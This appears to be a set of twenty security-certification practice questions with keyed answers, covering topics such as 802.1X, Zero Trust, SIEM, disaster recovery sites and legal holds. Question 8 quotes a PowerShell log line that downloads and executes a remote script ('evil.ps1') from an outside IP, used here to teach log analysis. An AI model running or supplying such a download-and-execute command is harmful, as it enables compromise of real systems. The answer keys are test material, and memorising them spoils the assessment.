QUESTION 1
An organization plans to increase security controls for devices that connect to its internal network. The additional security control must perform port-based authentication as part of the connection process. Which of the following should the organization implement?
A. EDR
B. SASE
C. 802.1X
D. WPA3
Correct Answer: C
QUESTION 2
A company must ensure that log searches are conducted in the shortest time frame. Which of the following should the company do to maintain logs in live storage for 90 days?
A. Conduct deduplication.
B. Conduct archiving.
C. Apply aggregation.
D. Apply compression.
Correct Answer: D
QUESTION 3
Which of the following best explains why an organization would choose a warm site for disaster recovery?
A. It reduces complexity by replicating data in real time across identical environments.
B. It eliminates the need for backup testing by using cloud-native infrastructure.
C. It offers fully automated fail over with no manual intervention required.
D. It balances cost and recovery time by maintaining partially configured systems.
Correct Answer: D
QUESTION 4
Which of the following best explains the use of a policy engine in a Zero Trust environment?
A. It is used by a central server to apply default permissions across a range of network and computing resources
B. It is used to make access control decisions without inheriting permission decisions from prior events.
C. It is used to dynamically assign user permissions based on a user’s identity and previous activity
D. It is used when user roles are unknown and the organization wants to leverage ML to control access.
Correct Answer: B
QUESTION 5
Which of the following is most likely in a responsibility matrix in a cloud computing environment?
A. The customer is responsible for information and data regardless of the cloud model used.
B. The cloud provider is responsible for account and identity management for connected devices.
C. The customer and the cloud provider share responsibility for the physical network infrastructure.
D. The cloud provider is responsible for the security of endpoints connected to the infrastructure.
Correct Answer: A
QUESTION 6
Which of the following would help determine whether a data synchronization strategy is synchronous or asynchronous within a BIA?
A. MTTR
B. MTBF
C. RPO
D. SLA
Correct Answer: C
QUESTION 7
Which of the following best explains the role of a SIEM in a security monitoring program?
A. Consolidating endpoint protection policies across multiple operating systems
B. Providing a centralized dashboard for firewall rule configuration and VPN access control
C. Automating vulnerability patch deployment by using predefined software baselines
D. Correlating log data from multiple sources to support threat detection and response
Correct Answer: D
QUESTION 8
A security analyst reviews the following endpoint log:
powershell -exec bypass -Command “IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1”)
Which of the following logs will help confirm an established connection to IP 176.30.40.50?
A. System event logs
B. EDR logs
C. Firewall logs
D. Application logs
Correct Answer: C
QUESTION 9
Which of the following best describes a threat actor who can coordinate a cyberattack to disable sensors and execute kinetic effects?
A. Insider threat
B. Hacktivist
C. Organized criminal
D. Nation-state
Correct Answer: D
QUESTION 10
A company performs risk analysis on its equipment and estimates it will experience about ten incidents over a five-year period. Which of the following is the correct ARO for the equipment?
A. 2
B. 5
C. 10
D. 50
Correct Answer: A
QUESTION 11
Which of the following scenarios will proper application of the least privilege principle prevent?
A. A network administrator shuts down a critical network interface.
B. An analyst saves an unauthorized configuration.
C. A threat actor discovers credentials for a shared service account.
D. A change is executed outside of the approved change window.
Correct Answer: B
QUESTION 12
An IT security director performs a security assessment on a vendor but fails to disclose that the director’s spouse is a high-level executive with the vendor. Which of the following best explains why the director should have disclosed this fact?
A. Rules of engagement
B. Right-to-audit clause
C. Due diligence
D. Conflict of interest
Correct Answer: D
QUESTION 13
Which of the following is a major security implication of connecting an ICS network to an enterprise network?
A. Increased need for authentication due to device segregation
B. Increased exposure to exploitation that could disrupt operations
C. Increased network congestion due to unmanaged devices
D. Increased vulnerabilities with the use of unsupported enterprise tools
Correct Answer: B
QUESTION 14
A staff member finds a USB drive in the office’s parking lot. Which of the following should the staff member do?
A. Notify the file owner after reviewing the contents of the drive.
B. Use an air-gapped system to open the files without exposing the network
C. Wipe the drive immediately using a secure method.
D. Submit the device to the security team without connecting it.
Correct Answer: D
QUESTION 15
An organization experiences a suspected data breach that affects sensitive client information. The incident response team must preserve logs, server images, and email communications related to the breach. Which of the following best describes this course of action?
A. Maintaining the chain of custody
B. Performing root cause analysis
C. Enforcing a legal hold
D. Conducting a containment activity
Correct Answer: C
QUESTION 16
Which of the following attacks are most likely to exploit vulnerabilities in RTOS?
A. Code injection
B. DDoS
C. Brute-force
D. XSS
Correct Answer: A
QUESTION 17
Which of the following is an example of passive reconnaissance against a company?
A. Calling a company’s employees to gather sensitive information
B. Mapping the company IP space with a ping sweep of the company’s network
C. Using automated tools to search public information on the internet
D. Poisoning the company’s DNS server’s cache with malicious queries
Correct Answer: C
QUESTION 18
After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps should the security manager take first to increase security awareness?
A. Evaluate tools that identify risky behavior and distribute reports on the findings.
B. Send quarterly newsletters that explain the importance of password management.
C. Develop phishing campaigns and notify the management team of any successes.
D. Update policies and handbooks to ensure all employees are informed of the new procedures.
Correct Answer: D
QUESTION 19
A security analyst must identify abnormal behavior on the server. Which of the following does the analyst most likely need to do?
A. Disable unnecessary ports.
B. Patch the system.
C. Establish baselines.
D. Perform alert tuning.
Correct Answer: C
QUESTION 20
The management team wants to assess the cybersecurity team’s readiness to respond to a threat scenario. Which of the following will adequately assess and formalize a response within a short time?
A. Send a message to all IT managers and request formal action plans.
B. Create a bug bounty program and assess the findings.
C. Execute a tabletop exercise and document the performance results.
D. Hire an external consultant to independently assess the cybersecurity processes.
Correct Answer: C
We use cookies to improve your experience, including essential cookies required for the website to function. By continuing, you agree to our use of cookies. Learn more.
We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.
Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.
Advertisement cookies are used to provide visitors with customised advertisements based on the pages you visited previously and to analyse the effectiveness of the ad campaigns.
Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.